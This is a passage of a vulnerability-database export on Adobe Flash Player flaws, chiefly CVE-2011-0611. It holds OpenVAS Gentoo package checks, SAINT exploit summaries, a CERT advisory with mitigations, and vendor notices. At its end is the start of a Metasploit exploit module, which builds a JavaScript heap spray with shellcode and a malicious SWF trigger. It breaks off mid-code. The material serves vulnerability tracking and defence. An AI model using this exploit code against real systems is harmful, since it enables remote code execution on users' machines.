\"CVE-2011-2430\", \"CVE-2011-2444\");\n script_version(\"$Revision: 6593 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:18:14 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-12 10:04:39 -0500 (Sun, 12 Feb 2012)\");\n script_name(\"Gentoo Security Advisory GLSA 201110-11 (Adobe Flash Player)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\nres = \"\";\nreport = \"\";\nif((res = ispkgvuln(pkg:\"www-plugins/adobe-flash\", unaffected: make_list(\"ge 10.3.183.10\"), vulnerable: make_list(\"lt 10.3.183.10\"))) != NULL ) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2428", "CVE-2011-2444", "CVE-2011-2416", "CVE-2011-0622", "CVE-2011-0626", "CVE-2011-0627", "CVE-2011-0619", "CVE-2011-2140", "CVE-2011-0623", "CVE-2011-0609", "CVE-2011-2424", "CVE-2011-0625", "CVE-2011-2134", "CVE-2011-2138", "CVE-2011-0628", "CVE-2011-2139", "CVE-2011-0572", "CVE-2011-0573", "CVE-2011-2429", "CVE-2011-0558", "CVE-2011-0608", "CVE-2011-0574", "CVE-2011-2425", "CVE-2011-2110", "CVE-2011-0560", "CVE-2011-0577", "CVE-2011-2414", "CVE-2011-0611", "CVE-2011-0618", "CVE-2011-0561", "CVE-2011-2130", "CVE-2011-2137", "CVE-2011-0578", "CVE-2011-2417", "CVE-2011-2135", "CVE-2011-0579", "CVE-2011-2125", "CVE-2011-0571", "CVE-2011-2426", "CVE-2011-0575", "CVE-2011-2107", "CVE-2011-0559", "CVE-2011-2136", "CVE-2011-0624", "CVE-2011-0607", "CVE-2011-2415", "CVE-2011-0589", "CVE-2011-0621", "CVE-2011-2427", "CVE-2011-2430", "CVE-2011-0620"], "description": "The remote host is missing updates announced in\nadvisory GLSA 201110-11.", "modified": "2018-10-12T00:00:00", "published": "2012-02-12T00:00:00", "id": "OPENVAS:136141256231070774", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231070774", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201110-11 (Adobe Flash Player)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa_201110_11.nasl 11859 2018-10-12 08:53:01Z cfischer $\n#\n# Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.70774\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2011-0558\", \"CVE-2011-0559\", \"CVE-2011-0560\", \"CVE-2011-0561\", \"CVE-2011-0571\", \"CVE-2011-0572\", \"CVE-2011-0573\", \"CVE-2011-0574\", \"CVE-2011-0575\", \"CVE-2011-0577\", \"CVE-2011-0578\", \"CVE-2011-0579\", \"CVE-2011-0589\", \"CVE-2011-0607\", \"CVE-2011-0608\", \"CVE-2011-0609\", \"CVE-2011-0611\", \"CVE-2011-0618\", \"CVE-2011-0619\", \"CVE-2011-0620\", \"CVE-2011-0621\", \"CVE-2011-0622\", \"CVE-2011-0623\", \"CVE-2011-0624\", \"CVE-2011-0625\", \"CVE-2011-0626\", \"CVE-2011-0627\", \"CVE-2011-0628\", \"CVE-2011-2107\", \"CVE-2011-2110\", \"CVE-2011-2135\", \"CVE-2011-2125\", \"CVE-2011-2130\", \"CVE-2011-2134\", \"CVE-2011-2136\", \"CVE-2011-2137\", \"CVE-2011-2138\", \"CVE-2011-2139\", \"CVE-2011-2140\", \"CVE-2011-2414\", \"CVE-2011-2415\", \"CVE-2011-2416\", \"CVE-2011-2417\", \"CVE-2011-2424\", \"CVE-2011-2425\", \"CVE-2011-2426\", \"CVE-2011-2427\", \"CVE-2011-2428\", \"CVE-2011-2429\", \"CVE-2011-2430\", \"CVE-2011-2444\");\n script_version(\"$Revision: 11859 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 10:53:01 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-12 10:04:39 -0500 (Sun, 12 Feb 2012)\");\n script_name(\"Gentoo Security Advisory GLSA 201110-11 (Adobe Flash Player)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities in Adobe Flash Player might allow remote\n attackers to execute arbitrary code or cause a Denial of Service.\");\n script_tag(name:\"solution\", value:\"All Adobe Flash Player users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-plugins/adobe-flash-10.3.183.10'\");\n\n script_xref(name:\"URL\", value:\"http://www.securityspace.com/smysecure/catid.html?in=GLSA%20201110-11\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=354207\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=359019\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=363179\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=367031\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=370215\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=372899\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=378637\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=384017\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/advisories/apsa11-01.html\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/advisories/apsa11-02.html\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb11-02.html\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb11-12.html\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb11-13.html\");\n script_xref(name:\"URL\", value:\"https://www.adobe.com/support/security/bulletins/apsb11-21.html\");\n script_xref(name:\"URL\", value:\"https://www.adobe.com/support/security/bulletins/apsb11-26.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing updates announced in\nadvisory GLSA 201110-11.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-gentoo.inc\");\ninclude(\"revisions-lib.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = ispkgvuln(pkg:\"www-plugins/adobe-flash\", unaffected: make_list(\"ge 10.3.183.10\"), vulnerable: make_list(\"lt 10.3.183.10\"))) != NULL ) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2016-10-03T15:01:58", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-0611"], "description": "Added: 04/21/2011 \nCVE: [CVE-2011-0611](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0611>) \nBID: [47314](<http://www.securityfocus.com/bid/47314>) \nOSVDB: [71686](<http://www.osvdb.org/71686>) \n\n\n### Background\n\n[Adobe Flash Player](<http://www.adobe.com/products/flashplayer/>) is a cross-platform browser plug-in providing visual enhancements for web pages. \n\n### Problem\n\nA memory corruption vulnerability allows command execution when the browser loads a specially crafted Small Web Format (SWF) file. \n\n### Resolution\n\n[Upgrade](<http://get.adobe.com/flashplayer/>) to Adobe Flash Player 10.2.153.2 for Windows or higher. \n\n### References\n\n<http://www.adobe.com/support/security/advisories/apsa11-02.html> \n<http://secunia.com/advisories/44119/> \n\n\n### Limitations\n\nExploit works on Adobe Systems Flash Player 10.2.153.1. The targeted user must open the exploit file in Internet Explorer 7. \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2011-04-21T00:00:00", "published": "2011-04-21T00:00:00", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/flash_callmethod_bytecode", "id": "SAINT:D1E10A87E683A65C65EF800D90A66751", "type": "saint", "title": "Adobe Flash Player callMethod Bytecode Memory Corruption", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-04T23:19:34", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-0611"], "description": "Added: 04/21/2011 \nCVE: [CVE-2011-0611](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0611>) \nBID: [47314](<http://www.securityfocus.com/bid/47314>) \nOSVDB: [71686](<http://www.osvdb.org/71686>) \n\n\n### Background\n\n[Adobe Flash Player](<http://www.adobe.com/products/flashplayer/>) is a cross-platform browser plug-in providing visual enhancements for web pages. \n\n### Problem\n\nA memory corruption vulnerability allows command execution when the browser loads a specially crafted Small Web Format (SWF) file. \n\n### Resolution\n\n[Upgrade](<http://get.adobe.com/flashplayer/>) to Adobe Flash Player 10.2.153.2 for Windows or higher. \n\n### References\n\n<http://www.adobe.com/support/security/advisories/apsa11-02.html> \n<http://secunia.com/advisories/44119/> \n\n\n### Limitations\n\nExploit works on Adobe Systems Flash Player 10.2.153.1. The targeted user must open the exploit file in Internet Explorer 7. \n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2011-04-21T00:00:00", "published": "2011-04-21T00:00:00", "id": "SAINT:37227B38CBD904922BB3BD8CB235215F", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/flash_callmethod_bytecode", "title": "Adobe Flash Player callMethod Bytecode Memory Corruption", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T17:19:50", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-0611"], "edition": 2, "description": "Added: 04/21/2011 \nCVE: [CVE-2011-0611](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0611>) \nBID: [47314](<http://www.securityfocus.com/bid/47314>) \nOSVDB: [71686](<http://www.osvdb.org/71686>) \n\n\n### Background\n\n[Adobe Flash Player](<http://www.adobe.com/products/flashplayer/>) is a cross-platform browser plug-in providing visual enhancements for web pages. \n\n### Problem\n\nA memory corruption vulnerability allows command execution when the browser loads a specially crafted Small Web Format (SWF) file. \n\n### Resolution\n\n[Upgrade](<http://get.adobe.com/flashplayer/>) to Adobe Flash Player 10.2.153.2 for Windows or higher. \n\n### References\n\n<http://www.adobe.com/support/security/advisories/apsa11-02.html> \n<http://secunia.com/advisories/44119/> \n\n\n### Limitations\n\nExploit works on Adobe Systems Flash Player 10.2.153.1. The targeted user must open the exploit file in Internet Explorer 7. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2011-04-21T00:00:00", "published": "2011-04-21T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/flash_callmethod_bytecode", "id": "SAINT:75531313EF0C522E1ADBAD17BC07C016", "type": "saint", "title": "Adobe Flash Player callMethod Bytecode Memory Corruption", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2020-09-18T20:42:02", "bulletinFamily": "info", "cvelist": ["CVE-2011-0611"], "description": "### Overview \n\nAdobe Flash contains a vulnerability that can allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description \n\nThe following versions of Adobe Flash versions contain an unspecified vulnerability that can result in memory corruption:\n\n * Adobe Flash Player 10.2.153.1 and earlier versions for Windows, Macintosh, Linux and Solaris operating systems\n * Adobe Flash Player 10.2.154.25 and earlier for Google Chrome users\n * Adobe Flash Player 10.2.156.11 and earlier for Android\n * The Authplay.dll component that ships with Adobe Reader and Acrobat X (10.0.2) and earlier 10.x and 9.x versions for Windows and Macintosh operating systems.\nThis vulnerability is being actively exploited in the wild. Exploit code for this vulnerability is publicly available as well. \n \nAny application that supports Flash or provides its own runtime may be vulnerable. Updating Flash Player does not update the Flash runtime included in those products. Note that separate instances of Flash are provided in a variety of Adobe products, including Adobe Reader and Acrobat. Adobe states that Adobe Reader 9.x for UNIX, Adobe Reader for Android, and Adobe Reader and Acrobat 8.x are not affected by this issue. \n--- \n \n### Impact \n\nBy convincing a user to view a specially crafted HTML document (e.g., a web page or an HTML email message or attachment), PDF file, Microsoft Office document, or any other document that supports embedded SWF content, an attacker may be able to execute arbitrary code. \n \n--- \n \n### Solution \n\n**Apply an update** \nThis issue is addressed in Adobe Flash Player 10.2.159.1. Please see Adobe Security bulletin [APSB11-07](<http://www.adobe.com/support/security/bulletins/apsb11-07.html>) for more details. Adobe Reader 9.4.4 and Reader X 10.0.3 provide an updated Flash runtime to address this issue. Please see Adobe Security Bulletin [APSB11-08](<http://www.adobe.com/support/security/bulletins/apsb11-08.html>) for more details. Please also consider the following workarounds to mitigate this and other Flash vulnerabilities: \n \n--- \n \n**Use the Microsoft Enhanced Mitigation Experience Toolkit**\n\n \nThe [Microsoft Enhanced Mitigation Experience Toolkit](<http://www.microsoft.com/downloads/en/details.aspx?FamilyID=c6f0a6ee-05ac-4eb6-acd0-362559fd2f04>) (EMET) can be used to help prevent exploitation of this and other vulnerabilities. Additional information can be found in the [Microsoft Security Research & Defense blog](<http://blogs.technet.com/b/srd/archive/2011/03/17/blocking-exploit-attempts-of-the-recent-flash-0-day.aspx>). Additional workarounds include: \n \n**Disable Flash in your web browser** \n \nDisable Flash or selectively enable Flash content as described in [Securing Your Web Browser](<http://www.us-cert.gov/reading_room/securing_browser/>). \n \n**Disable Flash and 3D & Multimedia support in Adobe Reader 9 and later** \n \nFlash and 3D & Multimedia support are implemented as plug-in libraries in Adobe Reader. Disabling Flash in Adobe Reader will only mitigate attacks that use an SWF embedded in a PDF file. Disabling 3D & Multimedia support does not directly address the vulnerability, but it does provide additional mitigation and results not in a crash but in a more user-friendly error message. \n \nTo disable Flash and 3D & Multimedia support in Adobe Reader 9 on Microsoft Windows, delete or rename these files: \n \n`\"%ProgramFiles%\\Adobe\\Reader 9.0\\Reader\\authplay.dll\"` \n`\"%ProgramFiles%\\Adobe\\Reader 9.0\\Reader\\rt3d.dll\"` \nFor Apple Mac OS X, delete or rename these files: \n \n`\"/Applications/Adobe Reader 9/Adobe Reader.app/Contents/Frameworks/AuthPlayLib.bundle\"` \n`\"/Applications/Adobe Reader 9/Adobe Reader.app/Contents/Frameworks/Adobe3D.framework\"` \nFor GNU/Linux, delete or rename these files (locations may vary among distributions): \n \n`\"/opt/Adobe/Reader9/Reader/intellinux/lib/libauthplay.so\"` \n`\"/opt/Adobe/Reader9/Reader/intellinux/lib/librt3d.so\"` \n**NOTE:** Adobe states that this particular vulnerability does not affect the authplay component supplied with Reader for Linux. The steps listed above are being provided for users who wish to proactively disable the 3D and multimedia support in the version of Reader for Linux. \nFor versions of Adobe Reader newer than 9, please adjust the above file paths accordingly. File locations may be different for Adobe Acrobat or other Adobe products that include Flash and 3D & Multimedia support. Disabling these plug-ins will reduce functionality and will not protect against SWF files hosted on websites. Depending on the update schedule for products other than Flash Player, consider leaving Flash and 3D & Multimedia support disabled unless they are absolutely required. \n \n**Remove Flash** \n \nAdobe has provided a [TechNote](<http://kb2.adobe.com/cps/141/tn_14157.html>) with utilities for uninstalling the Flash Player plug-in and ActiveX control on Windows and Mac OS X systems. Removing these components can mitigate the web browser attack vector for this vulnerability. Note that this will not remove the instances of Flash Player that are installed with Adobe Reader or other Adobe products. \n \n**Disable JavaScript in Adobe Reader and Acrobat** \n \nDisabling JavaScript can help mitigate some techniques that use Adobe Reader as an attack vector. \n \nTo disable JavaScript in Adobe Reader:\n\n 1. Open Adobe Acrobat Reader.\n 2. Open the `Edit` menu.\n 3. Choose the `Preferences...` option.\n 4. Choose the `JavaScript` section.\n 5. Uncheck the `Enable Acrobat JavaScript` checkbox.\nDisabling JavaScript will not resolve the vulnerabilities, it will only disable the vulnerable JavaScript component. When JavaScript is disabled, Adobe Reader and Acrobat prompt to re-enable JavaScript when opening a PDF that contains JavaScript. \n \n**Prevent Internet Explorer from automatically opening PDF documents** \n \nThe installer for Adobe Reader and Acrobat configures Internet Explorer to automatically open PDF files without any user interaction. This behavior can be reverted to the safer option of prompting the user by importing the following as a .REG file: \n \n`Windows Registry Editor Version 5.00` \n \n`[HKEY_CLASSES_ROOT\\AcroExch.Document.7]` \n`\"EditFlags\"=hex:00,00,00,00` \n**Disable the displaying of PDF documents in the web browser** \n \nPreventing PDF documents from opening inside a web browser reduces the attack surface. If this workaround is applied to updated versions of Adobe Reader and Acrobat, it may protect against future vulnerabilities. \n \nTo prevent PDF documents from automatically opening in a web browser with Adobe Reader:\n\n 1. Open Adobe Acrobat Reader.\n 2. Open the `Edit` menu.\n 3. Choose the `Preferences...` option.\n 4. Choose the `Internet` section.\n 5. Uncheck the `Display PDF in browser` checkbox.\n**Enable DEP in Microsoft Windows** \n \nConsider enabling Data Execution Prevention (DEP) in supported versions of Windows. DEP should not be treated as a complete workaround, but it can mitigate the execution of attacker-supplied code in some cases. Microsoft has published detailed technical information about DEP in Security Research & Defense blog posts \"Understanding DEP as a mitigation technology\" [part 1](<http://blogs.technet.com/srd/archive/2009/06/05/understanding-dep-as-a-mitigation-technology-part-1.aspx>) and [part 2](<http://blogs.technet.com/srd/archive/2009/06/12/understanding-dep-as-a-mitigation-technology-part-2.aspx>). DEP should be used in conjunction with the application of patches or other mitigations described in this document. \n--- \n \n### Vendor Information\n\n230057\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Adobe Affected\n\nUpdated: April 21, 2011 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.adobe.com/support/security/bulletins/apsb11-07.html>\n * <http://www.adobe.com/support/security/bulletins/apsb11-08.html>\n * <http://www.adobe.com/support/security/advisories/apsa11-02.html>\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://www.adobe.com/support/security/bulletins/apsb11-07.html>\n * <http://www.adobe.com/support/security/bulletins/apsb11-08.html>\n * <http://www.adobe.com/support/security/advisories/apsa11-02.html>\n * <http://www.microsoft.com/downloads/en/details.aspx?FamilyID=c6f0a6ee-05ac-4eb6-acd0-362559fd2f04>\n * <http://blogs.technet.com/b/srd/archive/2011/03/17/blocking-exploit-attempts-of-the-recent-flash-0-day.aspx>\n\n### Acknowledgements\n\nThanks to Adobe for reporting this vulnerability.\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2011-0611](<http://web.nvd.nist.gov/vuln/detail/CVE-2011-0611>) \n---|--- \n**Severity Metric:** | 46.47 \n**Date Public:** | 2011-04-11 \n**Date First Published:** | 2011-04-12 \n**Date Last Updated: ** | 2011-04-21 19:37 UTC \n**Document Revision: ** | 17 \n", "modified": "2011-04-21T19:37:00", "published": "2011-04-12T00:00:00", "id": "VU:230057", "href": "https://www.kb.cert.org/vuls/id/230057", "type": "cert", "title": "Adobe Flash Player contains unspecified code execution vulnerability", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T12:05:28", "bulletinFamily": "unix", "cvelist": ["CVE-2011-0611"], "edition": 1, "description": "Specially crafted Flash files as delivered by web sites or as .swf-files could exploit the flash player to execute arbitrary code with the privileges of the user viewing these files. CVE-2011-0611 has been assigned to this issue.\n#### Solution\nIf supported by the browser, you can disable the flash plugin.", "modified": "2011-04-18T16:33:38", "published": "2011-04-18T16:33:38", "href": "http://lists.opensuse.org/opensuse-security-announce/2011-04/msg00004.html", "id": "SUSE-SA:2011:018", "title": "remote code execution in flash-player", "type": "suse", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2019-08-13T18:45:37", "bulletinFamily": "unix", "cvelist": ["CVE-2011-0611"], "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash\nPlayer web browser plug-in.\n\nThis update fixes one vulnerability in Adobe Flash Player. This\nvulnerability is detailed on the Adobe security page APSB11-07, listed in\nthe References section. Specially-crafted SWF content could cause\nflash-plugin to crash or, potentially, execute arbitrary code.\n(CVE-2011-0611)\n\nAll users of Adobe Flash Player should install this updated package, which\nupgrades Flash Player to version 10.2.159.1.\n", "modified": "2018-06-07T09:04:29", "published": "2011-04-18T04:00:00", "id": "RHSA-2011:0451", "href": "https://access.redhat.com/errata/RHSA-2011:0451", "type": "redhat", "title": "(RHSA-2011:0451) Critical: flash-plugin security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-02T07:21:31", "description": "Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability. CVE-2011-0611. Remote exploit for windows platform", "published": "2011-04-16T00:00:00", "type": "exploitdb", "title": "Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-0611"], "modified": "2011-04-16T00:00:00", "id": "EDB-ID:17175", "href": "https://www.exploit-db.com/exploits/17175/", "sourceData": "##\r\n# $Id: adobe_flashplayer_flash10o.rb 12330 2011-04-16 02:09:33Z sinn3r $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n\tdef initialize(info={})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => \"Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability\",\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability in Adobe Flash Player that was discovered, and\r\n\t\t\t\thas been exploited actively in the wild. By embedding a specially crafted .swf file,\r\n\t\t\t\tAdobe Flash crashes due to an invalid use of an object type, which allows attackers to\r\n\t\t\t\toverwrite a pointer in memory, and results arbitrary code execution.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => \"$Revision: 12330 $\",\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'sinn3r',\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2011-0611' ],\r\n\t\t\t\t\t[ 'OSVDB', '71686' ],\r\n\t\t\t\t\t[ 'BID', '47314' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb11-07.html' ],\r\n\t\t\t\t\t[ 'URL', 'http://blogs.technet.com/b/mmpc/archive/2011/04/12/analysis-of-the-cve-2011-0611-adobe-flash-player-vulnerability-exploitation.aspx' ],\r\n\t\t\t\t\t[ 'URL', 'http://contagiodump.blogspot.com/2011/04/apr-8-cve-2011-0611-flash-player-zero.html' ],\r\n\t\t\t\t\t[ 'URL', 'http://bugix-security.blogspot.com/2011/04/cve-2011-0611-adobe-flash-zero-day.html' ],\r\n\t\t\t\t\t[ 'URL', 'http://secunia.com/blog/210' ],\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t},\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'ExitFunction' => \"process\",\r\n\t\t\t\t\t'InitialAutoRunScript' => 'migrate -f',\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'IE 6/7 on Windows XP SP3 and Windows Vista', {} ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => \"Apr 11 2011\",\r\n\t\t\t'DefaultTarget' => 0))\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\r\n\t\tagent = request.headers['User-Agent']\r\n\t\tif agent !~ /MSIE \\d\\.\\d/ and agent !~ /NT \\d\\.\\d/\r\n\t\t\tsend_not_found(cli)\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tif request.uri =~ /\\.swf/\r\n\t\t\tprint_status(\"Sending trigger SWF...\")\r\n\t\t\tsend_response(cli, @trigger, {'Content-Type'=>'application/x-shockwave-flash'} )\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tshellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\r\n\t\tnopsled = Rex::Text.to_unescape( [0x0c0c0c0c].pack('V') * 8 , Rex::Arch.endian(target.arch))\r\n\r\n\t\tswf_name = rand_text_alpha(rand(3))\r\n\t\tjs_func_name = rand_text_alpha(rand(6) +3)\r\n\t\tjs_var_blocks_name = rand_text_alpha(rand(6) + 3)\r\n\t\tjs_var_shell_name = rand_text_alpha(rand(6) + 3)\r\n\t\tjs_var_nopsled_name = rand_text_alpha(rand(6) + 3)\r\n\t\tjs_var_index_name = rand_text_alpha(rand(6) + 3)\r\n\t\tjs_var_padding_offset = rand_text_alpha(rand(6) + 3)\r\n\t\ttrigger_file_name = \"#{get_resource}/#{swf_name}.swf\"\r\n\r\n\t\thtml = <<-EOS\r\n\t\t<html>\r\n\t\t<head>\r\n\t\t<script>\r\n\t\tfunction #{js_func_name}() {\r\n\t\t\tvar #{js_var_blocks_name} = new Array();\r\n\t\t\tvar #{js_var_shell_name} = unescape(\"#{shellcode}\");\r\n\t\t\tvar #{js_var_nopsled_name} = unescape(\"#{nopsled}\");\r\n\t\t\tvar #{js_var_padding_offset} = #{js_var_shell_name}.length;\r\n\t\t\twhile (#{js_var_nopsled_name}.length < 0x10101) { #{js_var_nopsled_name} += unescape(\"#{nopsled}\") };\r\n\t\t\t#{js_var_nopsled_name} = #{js_var_nopsled_name}.substring(#{js_var_padding_offset}, #{js_var_nopsled_name}.length);\r\n\t\t\t#{js_var_blocks_name}[0] = #{js_var_nopsled_name} + #{js_var_shell_name};\r\n\t\t\tfor (#{js_var_index_name}=1; #{js_var_index_name} < 0x802; #{js_var_index_name}++) {\r\n\t\t\t\t#{js_var_blocks_name}[#{js_var_index_name}] = #{js_var_blocks_name}[0].substring(0, #{js_var_blocks_name}[0].length);\r\n\t\t\t}\r\n\t\t}\r\n\t\t#{js_func_name}();\r\n\t\t</script>\r\n\t\t</head>\r\n\t\t<body>\r\n\t\t<object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\"0\" height=\"0\"\r\n\t\tcodebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\">\r\n\t\t<param name=\"movie\" value=\"#{trigger_file_name}\" />\r\n\t\t<embed src=\"#{trigger_file_name}\" quality=\"high\" type=\"application/x-shockwave-flash\"\r\n\t\tpluginspage=\"http://www.macromedia.com/go/getflashplayer\">\r\n\t\t</embed>\r\n\t\t</body>\r\n\t\t</html>\r\n\t\tEOS\r\n\r\n\t\thtml = html.gsub(/^\\t\\t/, \"\")\r\n\r\n\t\tprint_status(\"Sending malicious HTML to 